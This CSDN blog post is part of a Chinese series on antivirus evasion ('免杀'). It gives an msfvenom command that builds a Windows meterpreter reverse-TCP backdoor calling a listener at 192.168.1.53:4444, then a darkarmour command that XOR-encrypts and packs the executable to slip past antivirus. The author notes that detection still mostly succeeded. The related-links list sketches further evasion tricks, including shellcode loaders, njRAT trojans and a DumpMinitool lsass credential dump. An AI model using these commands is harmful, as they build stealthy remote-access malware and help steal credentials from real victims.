免杀方法(九)msf加密壳免杀

最新推荐文章于 2024-04-22 05:04:30 发布
最新推荐文章于 2024-04-22 05:04:30 发布
阅读量479 收藏 1
点赞数
分类专栏: 免杀技巧 安全 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56426046/article/details/127165289
版权

项目地址GitHub - bats3c/darkarmour: Windows AV Evasion

安装依赖环境 

sudo apt install mingw-w64-tools mingw-w64-common g++-mingw-w64
gcc-mingw-w64 upx-ucl osslsigncode

msf生成后门

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -f exe -o exploit.exe

 执行命令

./darkarmour.py -f exploit.exe --encrypt xor --jmp -o e.exe --loop 5

 效果不是很好都查杀

仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。

夜yesec
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
国外免杀FuD_Jonnynho_CrypteR可过360全套
09-15
国外免杀FuD_Jonnynho_CrypteR可过360全套
通过Python实现Payload分离免杀过程详解
01-19
msf生成shellcode代码: 将payload给copy下来,去除引号。 \x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42 \x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33 \x49\x6f\x44\x37\x64\...
Python免杀技术详解
weixin_68789096的博客
11-02 823
在网络安全领域,Shellcode加载器通常被黑客用于将Shellcode加载到目标计算机的内存中并执行它。这些加载器被安全专业人员、研究人员和安全分析师用于分析恶意软件样本中的Shellcode部分,以便了解恶意软件的行为、目的和潜在威胁。Python的灵活性和强大的库,使得Python逐渐被用于Shellcode的加载和免杀技术。我们可以利用Python中的ctypes库实现shellcode的加载,ctypes是Python的外部函数库。
绕过杀软(二)——免杀exe文件(360、火绒免杀
热门推荐
W小哥
06-12 1万+
攻击机: win7 IP: 192.168.32.134 靶机: windows server 2012(安装360、火绒) IP: 192.168.32.133第一步:使用njRAT生产一个客户端exe木马 输入回连端口号8888,点击start 配置客户端木马的回连地址:192.168.32.134 将文件保存在桌面 开启360杀毒,直接报毒,不免杀 1、将生成的客户端木马:Server.exe在 Encryption Tool V3.0中以base64加密方式打开 打开之后,将base6
免杀】木马免杀制作
qq_48201589的博客
03-25 1096
免杀就是指能够使病毒木马逃避杀毒软件检测的一种技术。总体来讲,免杀分为静态免杀和动态免杀,静态免杀基于特征值,而动态免杀则是基于行为。这里我们讲Cobalt Strike生成Python木马,免杀绕过火绒。
免杀exe技术探讨
goddemon
07-19 1117
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任最近把大部分的语言的捣鼓分析了下c的python的rust的go的常见的语言市面上有的都研究了下也写了一下自己的发觉python的确实可以说是最简单的了,不过其实深入免杀的话还是得进程注入走ring0层去对抗杀软,不然单纯的静态过了终究有些行为还是会呗动态杀这篇分享一篇python的吧效果看正文全过的也有不过现在肯定是不会发的。...
免杀对抗-成品EXE免杀-反特征码-通用跳转
xiaoheizi的博客
10-04 1054
1.将工具和exe程序放到环境中,启动程序,点击制作测试文件---选择exe程序,点击ok后会在工具目录下生成一个virtest.vir文件。因为目标使用的是火绒,所以我们自己搭建一个火绒环境,使用VirTest工具检测出exe程序的什么地方被火绒杀了。所以需要再次修改特征码处:将保存了00区间修改的exe程序拖入ollydbg工具中,搜索定位特征码汇编地址后四位。22.开启火绒检测,只保存了00区间修改的半成品被杀了。9.定位到特征码处,向下滑动一下,然后选中复制,将特征码的汇编地址保存起来。
Exp3-免杀原理与实践-20202127
qq_57435798的博客
03-29 496
本此实验遇到的比较大的问题就是veil的安装,当时反复出现wine32缺失的报错,按照系统给的命令操作之后,却又一直卡在某一行,我也不知道是这一步就应该等待这么久还是我的操作出现了问题,反复多次尝试之后,我在操作到那一步之后,出去吃了顿晚饭,回来之后就惊喜地发现veil已经安装完毕,由此,我也确定了我的操作并没有问题,只是确实需要等待很久。同时,由于恶意代码也会随着科技进步发展变化,只能说是最大程度地去防止恶意代码,而且不同的杀软有不同的性能,对于恶意代码的防范也有一定的局限性,所以绝对是很难做到的!
关于如何使用shellter以及shielden对于正常软件的双重加,过火绒和360
07-16
本资源是本人自己学习msf是针对于加入侵而特地学习和总结,为了和同工作室进行分享而编辑的ppt,如果有兄弟需要软件以及更加详细的操作的可以私信我,当然我是一个刚刚入门的新手,如果有错误的地方可以告诉我,...
捆绑机免杀无后门无木马
11-22
捆绑机免杀无后门无木马,使用请参照详细说明,请别用于非法途径,否则后果自负
SE一键加三十秒秒过360.zip
09-20
SE一键加三十秒秒过360 快速(bypass)免杀360 3步快速加 (短期内应该有效) 作者自己在虚拟机测试时msf的木马能过360
第六十六课:借助aspx对payload进行分离免杀1
08-03
靶机背景:msf exploit(multi/handler) > set lhost 192.168.1.5msf exploit(multi/handler
厉害!免杀任意EXE
南迪叶先森
07-06 2851
公粽号:黒掌 一个专注于分享网络安全、黑客圈热点、黑客工具技术区博主! PE文件 PE文件简述 PE文件的全称是Portable Executable,意为可移植的可执行的文件,常见的EXE、DLL、OCX、SYS、COM都是PE文件,PE文件是微软Windows操作系统上的程序文件(可能是间接被执行,如DLL),这篇文章主要讲对EXE文件进行内存加载并运行的方法,代码实现,和完成一个GUI加载器工具的全过程。 文件结构 由上图可以 Dos Header 是用来兼容MS-DOS操作系统的,目的是当.
微软自带签名exe免杀dump hash
weixin_44747030的博客
04-16 1236
微软签名DumpMinitool.exe免杀dump hash 微软签名的exe dump lsass进程 DumpMinitool.exe --file 1.txt --processId 948 --dumpType Full --file 保存文件名为1.txt 规避一下杀软 --processId lsass.exe 进程号 杀软无拦截 查看1.dmp sekurlsa::minidump "1.dmp" sekurlsa::logonpasswords 参考文章:https://
linux之shell 输入输出
cuichangzhi5476的博客
01-24 150
如果希望创建一个新文件,并向其中输入一些内容,只需使用cat命令把标准输出重定向到该文件中,这时cat命令的输入是标准输入—键盘,你输入一些文字,输入完毕后按< C T R L - D >结束输入。这真是一个非常简单...
一个菜鸡的免杀之路(一)
m0_59598029的博客
09-09 43
作为一个web狗,对免杀这块是一直没办法深入学习,在恶补了些二进制基础后,开启了我的免杀之路(doge)
【网络安全】木马免杀方式——加免杀
A1_3_9_7的博客
01-25 1225
免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如)中,有一些会被杀毒软件认为是木马病毒;一些安全领域中的部分安全检测产品,也会被杀毒软件误杀,这时就需要免杀技术来应对这些不稳定因素。
免杀技术有一套(免杀方法大集结)
hackzkaq的博客
05-23 6993
零基础学黑客,搜索公众号:白帽子左一 00. 概述 什么是免杀?来自百科的注解: 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反杀毒技术”。 有本比较有名的书,想详细学习的同学可以去看看。《黑客免杀攻防》 其实我大概好像只看过目录…( ╯□╰ ) 下面我介绍的是自己实践的一些方法,有没有效果,试试就知道了。 01. 简介 免杀大概可以分为两种情况: 二进制的免杀(无源
Windows设置右键打开管理员CMD
最新发布
轩辕霸天L
04-22 226
管理员CMD设置
msf脚本
05-24
使用MSF中的脚本需要掌握一定的Ruby编程知识和MSF框架的使用方法。下面是一个简单的MSF脚本示例: ```ruby require 'msf/core' class MyModule < Msf::Auxiliary def initialize super( 'Name' => 'My Module'...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜yesec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值